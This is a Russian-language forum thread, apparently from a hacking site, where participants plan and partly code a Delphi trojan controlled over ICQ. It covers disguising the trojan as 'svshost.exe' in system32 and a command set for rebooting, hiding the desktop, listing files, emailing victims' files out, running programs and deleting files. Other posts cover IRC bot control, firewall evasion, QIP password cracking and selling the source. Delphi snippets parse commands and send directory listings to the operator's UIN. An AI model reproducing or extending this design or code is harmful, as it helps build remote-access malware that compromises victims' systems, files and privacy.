Люди мош кто папробует написать троя? на Delphi?
есть хорошая идейка по этаму поваду:
Когда запускаеш этот вирус он просто переносится в папку C:\WINDOWS\system32 и имеет название svshost.exe так будет трудней его удалить.
Сам вирус я придлогаю написать на TICQCLient, чтобы управлять им через асю.
Функций для него конечно можно придумать много,но тем немения: вот мой списочек:
-------------------------------------------------------
RESTART_KAS
Функция перезагружает комьютер клиента без каких либо предупреждений.

STOPCMP_KAS
Функция подвесит компьютер клиента, сильно зависит от версии виндовса.

DESKTOP_HID
Функция скрывает рабочий стол клиента (его значки).

DESKTOP_SHW
Функция показывает рабочий стол клиента.

TRAY_HID
Функция скрывает системный трей (там где часы и значки программ)

TRAY_SHW
Функция показывает системный трей (там где часы и значки программ)

CDAUDIODOOR_OPEN
Функция откроет поддон CD-ROM клиента

CDAUDIODOOR_CLOSE
Функция закроет поддон CD-ROM клиента

TRAYWND_QUIT
Скрывает оболочку Explorer. Такое ощущение как будто выгрузили Explorer. Если пробовать запустить Explorer, то он не запускается.

TROY_QUIT_KASDIMA
Вырубает программу на текущую сессию виндовса. При перезагрузке программа запустится вновь.

WIND_NOTRESET
Блокирование перезагрузки, выхода из системы

WIND_YESRESET
Отменяет блокирование перезагрузки, выхода из системы

UNREGISRY_KASDIMA
по сути удаляет программу из системы (удаляет из автозагрузки)

Функции с параметрами
################################################## #####

MSG_ваше сообщение
Функция выведет любое сообщение от имени системы
Пример использования: MSG_Привет флудерам!. KAS!
Будет выведенно сообщение: Привет флудерам!. KAS!

GETIPUIN_ваш уин
Получение IP адреса. IP адрес придет в ответе.
Пример использования: GETIPUIN_333999666
IP адрес прийдет на номер 333999666

GETLISTPROC_ваш уин
Функция возвратит список процессов у клиента на компьютере.
Пример использования: GETLISTPROC_333999666
Список процессов прийдет на номер 333999666

OTDIR_KAS_ваш уин;Папка
Функция возвращает список файлов и папок в указанной папке
Пример использования: OTDIR_KAS_333999666;C:\
Список файлов и папок находящихся в C:\ прийдет на номер 333999666

SNDEMAIL_ящик пользователя;Файл
Функция пришлет на ящик пользователя письмо с указанным файлом
Пример использования: SNDEMAIL_motorola3653@mail.ru;C:\1.txt
Пришлет письмо на AlLex@mail.ru с файлом C:\1.txt

WINEXEC_программа
Выполнит любую программу с жесткого диска клиента.
Пример использования: WINEXEC_С:\miranda.exe
выполнит С:\miranda.exe на машине клиента


OTDIR_KAS_ваш номер;папка
Возвращает все папки и файлы в указанной папке
Пример использования: OTDIR_KAS_333999666;С:\
Возвратит на номерок 333999666 содержимое С:\

SHL_
Общее: SHL_Operation;Fname;Parametr;Directory;IntShow
Выполнит любое действие предусмотренное проводником виндовс
Расшифровка команд:
Operation - операция
Fname - полное имя файла
Parametr - параметр для открытия
Directory - папка где находится файл
IntShow - параметр видимости 5-отображать
Пример использования: SHL_open;C:\1.txt; ;C:\;5
Откроет файл C:\1.txt в блокноте

KILLTASK_
Убьет любой процесс в системе клиента
Пример использования: KILLTASK_notepad.exe
Убьет процесс notepad.exe

DELETEFILE_
Удалит любой файл с жесткого диска клиента
Пример использования: DELETEFILE_С:\1.txt
Удалит файл С:\1.txt
---------------------
Каждое сообщение которое не содержит признаки команды не будет никак воздействовать.
Мош всёже папробуем? насчёт этих функций я могу памоч немношко.Хорошо былобы иметь такой вирус...
--------------------
А также у меня появилась новая идейка, для того чтобы вирус весил меньше можно сделать его не через ICQ а через IRC, просто чтобы он заходил в комнату а ты ему туда команды посылаеш и всё.
Так даже можно каждуму из них задать имя и тогда им можно пользоватся неодним челом а нескольким.

http://forum.antichat.ru/thread40531.html
Примерно 0.5 от твоих функций. Правда на С++.

оригинально+
...недана будет ip вычислять и т п...

С использованием TICQClient'а размер exe будет немаленьким!

Чювак хорошо придумал, я за! вирус этот будет весить примерно 500 КБ но нечё страшного и такой сайдёт.оригинально+
...недана будет ip вычислять и т п...
это реально, вот автор темы же написал что паможет с функциями. Ну так чё есть претенденты которые попробуют написать???

Check dis:
ICQ-клиент, написаный на FASM: _http://wasm.ru/src/5/faim.zip

Check dis:
ICQ-клиент, написаный на FASM: _http://wasm.ru/src/5/faim.zip

извращенцы =\

Piflit почему? =) на основе этого сурса что угодно можно сделать! =\

Piflit почему? =) на основе этого сурса что угодно можно сделать! =\

думаю, ты сам понимаешь, почему =)
ЗЫ у меня не пашет, пишет, что логин и пасс неверные

Sorry! :(
Вот офф. страничка: _http://roticv.rantx.com/faim/
А вот реально работающая версия + сурс: _http://roticv.rantx.com/faim/faim021src.zip

NetMan ты прав... мош хватет опсуждать?мош всё же ктонебуть попробует написать и даст точный ответ палучится сделать или нет?

Есть уже подобная вещь. функций поменьше но смысл тот же. Delphi.

Fata1ex, размер большой?

342кб=( написан был в марте
715868 им. Кому интересно могут стукнуть и купить исходники. 5 у.е. вроде стоил=\

В майском номере журнала "Нахер" (он же Хакер) рассказывалось о написании примерно такой же тулзы тоже на Делфи кстати, могете взять за основу. Статья называлась "Ваяем Radmin".

Люди ну так что, кто возьмётся делать этот трой?))

Достаньте статью с НАХЕРА =)
Какой номер джурнала?

Парни, я что-то не совсем врубаюсь, это получается у каждого такого троя будет свой уин или у всех одинаковый, если одинаковый то они одновременно не зайдут все, а если у каждого разный, то это геморно... Объясните пожалуйста!

[krot] нет у каждого трояна будет свой иун, можно сказать у каждой жертве...ну а как ты будеш узнавать какой вирус у кого запущен??? это самый рптимальный вориант.

motorola3653
Так это же геморно получится, а если ты решил разослать 100 или 300 троев или вообще 1000 этож заипешься уины с пассами доставать, ИМХО

А если несколько человек скачали один и тот же трой с одинаковым уином, так это они все будут рватся в сеть под одним уином, муть какая-то получается...

Или вы имеете ввиду что трой будет типа радмина, что жертв будет немного в пределах нескольеих штук?
Я не понимаю, объясните, плиз!

[b]Ну кто напишит?))

[krot] ты дурак или прикидываешься?
1.Его незя запустить дважды на одном компе, он просто старый заменит и всё.
2.Сделаем прогу чтобы быстро и бес проблем менять в этом трое (uin и пасс).
Каму это надо рассылать 100 троев? на даже если и надо то придётся им найти 100 уинов....

ICQ Pro трой делать уже взялся n3m0 . Хотелось бы ещё притиндентов.

Хотелось бы ещё притиндентов.
Если найду такой же компонент для Си (неохота на дельфях сидеть), напишу свой вариант...

edit:Оказалось ,borland компонент для делфи спокойно устанавливается под Си... )

[krot] ты дурак или прикидываешься?
2 motorola3653 за языком следи!Понял?!

А если несколько человек скачали один и тот же трой с одинаковым уином, так это они все будут рватся в сеть под одним уином, муть какая-то получается...
А ты мне отвечаешь:
1.Его незя запустить дважды на одном компе, он просто старый заменит и всё.
Тут идет речь про разные компы! Может глазные капли поищешь для себя???

Каму это надо рассылать 100 троев?
К примеру, пинч и в больших объемах "рассылают" или ты скажешь, что пинч это не трой???!!! :D

n3m0
Спасибо за ответ, приятно иметь дело с культурным человеком :)
Скажи, а статистику делать будешь через пхп форму или просто трой будет запрашивать авторизацию у "хозяина" и данные об IP, OS и т.п. можно будет получить только с помощью команд, непосредственно обращаясь к каждому трояну?
Спасибо.

Хотелось бы узнать размер Exe...

n3m0 > TICQClient юзаешь? :) :)

Народ, а кто нибудь сталкивался с проблемой подключения к серверу ICQ при использовании
компонент от Кабана, а именно в проекте без форм?

TICQClient v.1.21 (пропатченная), Delphi 7

Тоесть даже если :

project SuperICQ;

uses windows, ICQClient,...;

var
ICQ : TICQClient;

begin
try
ICQ := TICQClient.Create(nil);
ICQ.UIN := 123123;
ICQ.PassWord := 'superpass';
ICQ.Login;
finally
....
ICQ.Free;
end;
end.

Причём именно в таком раскладе, если тоже самое перенести в проект где присутствуют формы, то всё нормально.

P.S. В некоторых модулях TICQClient были строчки
с директивами в которых автор давал рекомендацию
для их удаления, если компонент используется в проекте без форм, но толку это не дало. Пробовал вообще избавиться от класса TComponent из TICQClient, что бы привести всё к виду : ICQ := TICQClient.Create; вместо Create(nil). Но ничего не дало... в Королевстве Дельфи находил похожую проблему, но рецепта на излечения не нашёл :(

И на одном из сайтов нашёл похожую проблему, где парень писал плагин к Download Master, там давали совет включить строчку в проект Applicatio.CreateHandle; но в моём проекте вообще нет модуля Forms, .... вообщем уже 2 недели копаюсь... помогите пожалуйста!!!! SOS!!!

n3m0 > Имхо, не получиться сделать прогу маленькой, юзая TICQClient! Надо искать другой путь, например, самому реализовать. :)

а кто-нибуть знает, как в TICQclient указать local порт? (всмысле я хочу юзать несколько компонентов сразу(под несколько uin'ов), а один перекрывает другой)

на делфях не знаю как но думаю паскаль и делфи похожи
читаем строчку-исходная
цикл который переберает попорядку эту строчку и записывает в строку-1
как только доходим до спец символа который разделяет уин и пас выходим из цикла
и у нас есть переменная уин
слудующий цикл начинаеться с того места где закончил первый только на шаг в перед и читаешь до конца строку в цикле вот и все!
потом поделишься троем??:)
если время свободное есть разберусь и на делфях накатаю

Что то типа такого -

procedure TForm1.Button1Click(Sender: TObject);
var ER:tstrings;
i,k: integer;
q: boolean;
l,m,n: string;

begin
er:=TStringList.Create;
er.LoadFromFile('1.txt');
for i:=0 to er.Count - 1 do
begin
l:= er.Strings[i];
m:=''; n:='';
k:=1;
q:= false;
while k <= length(l) do
begin
if (l[k] = ';')
then begin
while k<= length(l) do
begin
inc(k);
n:= n + l[k];
end;
q:= true;
end
else begin
if q = true then exit;
m:= m + l[k];
inc(k);
end
end;
memo1.Lines.Add(m+' '+n);
end;
er.Free;
end;

Спасибо, на вид вроде рабочий. Днём проверю

Имхо, проще так :


procedure TForm1.Button1Click(Sender: TObject);
var
F : TextFile;
S : string;
UIN, PassWord : string;
begin
AssignFile (F, 'C:\1.txt');
{$I-}
Reset (F);
{$I+}
if IOresult = 0 then
begin
while not SeekEof (F) do
begin
ReadLn (F, S);
UIN := Trim (Copy (S, 1, Pos (';', S)-1));
PassWord := Trim (Copy (S, Pos (';', S)+1, Length (S)));
Memo1.Lines.Add (UIN+' - '+PassWord);
end;
CloseFile (F);
end;
end;

второй вариант имхо лучше! когда релиз троя?

Люди ну у кого есть время хотябы попробуйте написать токого троя.Плиз

Люди ну у кого есть время хотябы попробуйте написать токого троя.Плиз

Да дело не во времени, по крайней мере у меня. Нужен алгоритм расшифровки паролей QIP поздних версий. Вот если кто-нибудь поделился бы им, тогда
о чём то можно было говорить. Да и исходник троя уже как то пролетал в одном из топиков.

qip собрался ломать? шалун...имхо, если и найдешь алгоритм расшифровки, поиск будет долгий...мало кто халявно тебе отвалит..

qip собрался ломать? шалун...имхо, если и найдешь алгоритм расшифровки, поиск будет долгий...мало кто халявно тебе отвалит..

А кто тебе сказал, что я собрался это делать? Человек
просил готовое решение, ему ответили ;)

ну что с троем??

Metal пресоединяюсь.
Что с троем?

heh , я скачал TICQClient , а он сам с троем оказался :D

а вам не проще на сервере хранить файлик с пасами:уинами запрашивать его через пхп скрипт который каждый раз при выполнений удалял бы и зфайла 1 пару и выводил бы ее на страницу потом парсить эту страницу и и скать эту пару лучше делайте это через сокеты трой лопнет от еще одного компонента.

Компоненты это херня полная ) идея самая backdoor - писать на icq протоколе это тупо
1 Есть такая штука как IRC
2 Зачем делать то что сделали (я имею ввиду что идея та же самая что IRC ботов ) к тому же нада придумать реестрацию самого бекдора (получения логина и пароля )
3 Тут надо поставить вопрос еще что делать с нашимы видами защиты к примеру фаеры KIS и тому подобноя херня ) ведь обходить их слижновато (нада скакать с User moda в ring0 или Shadow System Service Table ) про это надо еще подумать а сам бекдор или тот самый Shell (I/O Thread ) скрытую консоль можно сделать за пару дней Писать надо без всяких там компонентов. С++ или масм или делфи это не имеет значения

1 Есть такая штука как IRC

надо же кокой гений , а почему тя еще в Micrisoft работать не взяли?
Сама идея реслизации анонимной авторизации трояна в сети через icq - оригинальна , если не гениальна...
Здесь не говорилось про облод фаерволов ... см др топик...

Предположим есть удаленный комп c динамическим ip (dialup/vpn) а тебе нада к нему регулярно коннектица , еще и анонимно...

Поднимать на нем irc сервер - идиотизм , а заставлять его заходить в какой либо канал - безрассудство (ибо палишь и себя и канал)...
А Icq обоспечивает как удобство (вместо ip юзаешь уин) , так и анонимность (что мешает те заюзать левый уин + прокси (как в qip,miranda) ) при этом еще и в качестве дополнительного прокси выступит сам сервер icq ...
А успешность, универсальность ,скрытность проэкта зависит уже от мастерства кодеров...

Кстати автору топика респект , а програмистам - совет : Сделайте настройщик трояна (с указанием уина и т п) , например в трояне фиксированый ini как resource... и настройщик , редактирующий его, как ресурс...

--> Jes "Поднимать на нем irc сервер - идиотизм , а заставлять его заходить в какой либо канал - безрассудство (ибо палишь и себя и канал)..."
Так скажи же мне почему первое место по популярности занимает Agobot, насчитывающий свыше пятисот своих модификаций ? а про icq так глухо ???
потомучто до вас такие гении как вы уже пытались это сделать но широкого роспространения не вышло!! (сказано не обиду ) Говорю про то что не надо делать то что делали ) Я понию что было круто управлять ботом по icq (даже с того самого моб. телл ) но есть но ...

Так скажи же мне почему первое место по популярности занимает Agobot, насчитывающий свыше пятисот своих модификаций ? а про icq так глухо ???

ни разу не видел троя с использованием irc ...
ps: а как ты будешь узнавать динамический ip жертвы каждый раз?

pps: буть у меня винда , ticq клиент для С++ и желание, я б за неделю написал...

протокол ойсикью слишком абузный для этого, могут не дать подключиться из за слишком частых подключений и так далее, не лучше ли использовать джабер или мэйл агент, работа с протоколом джабера проще ойсикью, + трой сам сможет регацо на сервере так как картинки там нет

to --> Jes "ни разу не видел троя с использованием irc ...
ps: а как ты будешь узнавать динамический ip жертвы каждый раз?" по функцыональности любой бот это и есть почти тот самый бекдор ) А зачем тебе IP ?? у тебя твой бекдор попадает на какую нить жертву вот после чего делает реверз коннект на сервак irc после чего висит на канале ) и все ) просто нада еще иметь опыт в irc

Поднимать на нем irc сервер - идиотизм , а заставлять его заходить в какой либо канал - безрассудство (ибо палишь и себя и канал)...
что за бред? зачем поднимать irc сервер? дело ограничивается ботом, который заходит на канал и получает команды. посмотри исходники irc ботов.

ИМХО использовать icq гораздо удобнее но это накладывает свои расходы к примеру тут аж целый компонент придется ссобой таскать а значит и всех его предков(предка). в случае irc, зачем поднимать целый сервер нужен лишь канал с паролем и бот который там будет крутится постоянно и команду опознавания хозяина

ИМХО использовать icq гораздо удобнее но это накладывает свои расходы к примеру тут аж целый компонент придется ссобой таскать а значит и всех его предков(предка).
а про другие реализации icq протокола ты конечно не слышал?

а про другие реализации icq протокола ты конечно не слышал?
не понял вопроса... реализовать можно хоть вручную что кстати будет более полезно в общеобразовательных целях но видимо этот вариант никого не устраивает из авторов а других целей я тут не вижу, врядли получится как говорится коммерческий проект

n3m0 если исходники будут в привате то стукнись в асю 6660135 или личку, помогу со скрытием в системе и паролями от qip =)
ЗЫ я люблю коммерческие проекты

неужели проект заброшен?
А также у меня появилась новая идейка, для того чтобы вирус весил меньше можно сделать его не через ICQ а через IRC, просто чтобы он заходил в комнату а ты ему туда команды посылаеш и всё.
Так даже можно каждуму из них задать имя и тогда им можно пользоватся неодним челом а нескольким. :) :)

неужели проект заброшен?
А также у меня появилась новая идейка, для того чтобы вирус весил меньше можно сделать его не через ICQ а через IRC, просто чтобы он заходил в комнату а ты ему туда команды посылаеш и всё.
Так даже можно каждуму из них задать имя и тогда им можно пользоватся неодним челом а нескольким. :) :)
это называется (ддос)бот

Сам вирус из первого поста готов, сделал его один типчик, так давать нехочет но прадаёт исходник за 500р.... antichaty скидка

Дайте кто нить исходник этого проекта??

оказывается вирусы кодят на VCL и складывают в папку Windows, чтоб не заметно было ))))) весело фигле )))

Так же интересуюсь исходником. Грамотный купил бы даже... ;)

Я сейчас заинтересовался этой темой и у меня вопрос : как вы собрались реализовывать таймер поддержки подключения? Да , и не могли бы вы кинуть сорцы на данный момент?

: как вы собрались реализовывать таймер поддержки подключения?
????

????
Ну как я понял чел имел в виду как мы будем делать таймер который будет конектитиь трой через интервалы времени к инету. ИМХО идиотский подход. Легче через сокет.

А как? Просто я делаю свой бот без формы фактически тот же трой , тока мирный и мне эта шня нужна.Как васобрались реализовывать?

Исходники дать немогу, так как хозяин потом будет в бешенстве, но помочь могу:
Ну там на форме всего 3 таймера
procedure TForm1.IcqLogTimer(Sender: TObject);
begin
if icq1.LoggedIn=false then
//Если ася не подключена
GO; // Подключаемся
end;


procedure TForm1.ICQANSWTimer(Sender: TObject);
begin
ICQANSW.Enabled:=false; //
ICQ1.SendMessage(StrToInt(UINansw),strAnsw);
Application.ProcessMessages;
end;

Трой просто весит в процессах и ждёт пока компьютер зайдёт в инет, как только он зашёл в инет он заходит в ICQ и ждёт там ваших команд

Мне больше интересен кое реализации "понимания" комманд. Особенно тех что с параметром.

1. Вот UIN вируса: 258-291-730 . Кто-то его запустил, иногда поевляется в сети.
2.OTDIR_KAS_ваш уин;Папка
Функция возвращает список файлов и папок в указанной папке
Пример использования: OTDIR_KAS_333999666;C:\
Список файлов и папок находящихся в C:\ прийдет на номер 333999666 ::::

if Copy(AnsiUpperCase(msg),1,10)='OTDIR_KAS_' then
begin
// OTDIR_KAS_OTDIR_KAS_333905248;C:\
mes:=msg;
delete(mes,1,10);
oper:= Copy(mes,1,Pos(';',mes)-1);
delete(mes,1,Pos(';',mes));
UINansw:= oper;
strAnsw:= GetDir(mes).Text;
ICQANSW.Enabled:=true;
Exit;
end;

xaker-boss тоесть ты хочешь сказать , что вы юзаете форму , но тогда проект до ху
весить будет.Да и ещё есть код подключения
program WinisqB;
uses Windows,SysUtils,Registry,ICQClient,ICQWorks;
var
ICQ: TICQClient;
begin
ICQ:= TICQClient.Create(nil);
ICQ.UIN:=44028935;
ICQ.Password:='kd';
ICQ.ICQServer:='login.icq.com';
ICQ.ICQPort:=5190;
ICQ.Login();
icq.Status:=8;
end.
он просто не конектит и всё . Чё неправильно ?

Manoff да мы юзаем форму, но она скрыта.
Код должен работать, НО у тебя неверный Password к UIN.

А ты думал , что я настоящий UIN c Pass'oм на форум кину :)?

xaker-boss тоесть ты хочешь сказать , что вы юзаете форму , но тогда проект до ху
весить будет.Да и ещё есть код подключения
program WinisqB;
uses Windows,SysUtils,Registry,ICQClient,ICQWorks;
var
ICQ: TICQClient;
begin
ICQ:= TICQClient.Create(nil);
ICQ.UIN:=44028935;
ICQ.Password:='kd';
ICQ.ICQServer:='login.icq.com';
ICQ.ICQPort:=5190;
ICQ.Login();
icq.Status:=8;
end.
он просто не конектит и всё . Чё неправильно ?

У меня все конектит, с чего ты вообще взял что он не логинится???

Люди мош кто папробует написать троя? на Delphi?
есть хорошая идейка по этаму поваду:
Когда запускаеш этот вирус он просто переносится в папку C:\WINDOWS\system32 и имеет название svshost.exe так будет трудней его удалить.
Сам вирус я придлогаю написать на TICQCLient, чтобы управлять им через асю.
Функций для него конечно можно придумать много,но тем немения: вот мой списочек:


конечно не в тему но... у меня вопрос, почему сам не напишеш ??
Разные функции здесь повыкладывал =)

Ну если ты незаметил тема была создана 09.06.2007, 13:50 .Тогда я неумел программировать. А сейчас у меня уже есть этот вир с исходником, но так как писал его не я, а только дорабатывал его я неимею никакого право выкладавать сюда исходник бес разрешения того кто его написал.Ну если у кого есть вопросы про функции обращайтесь.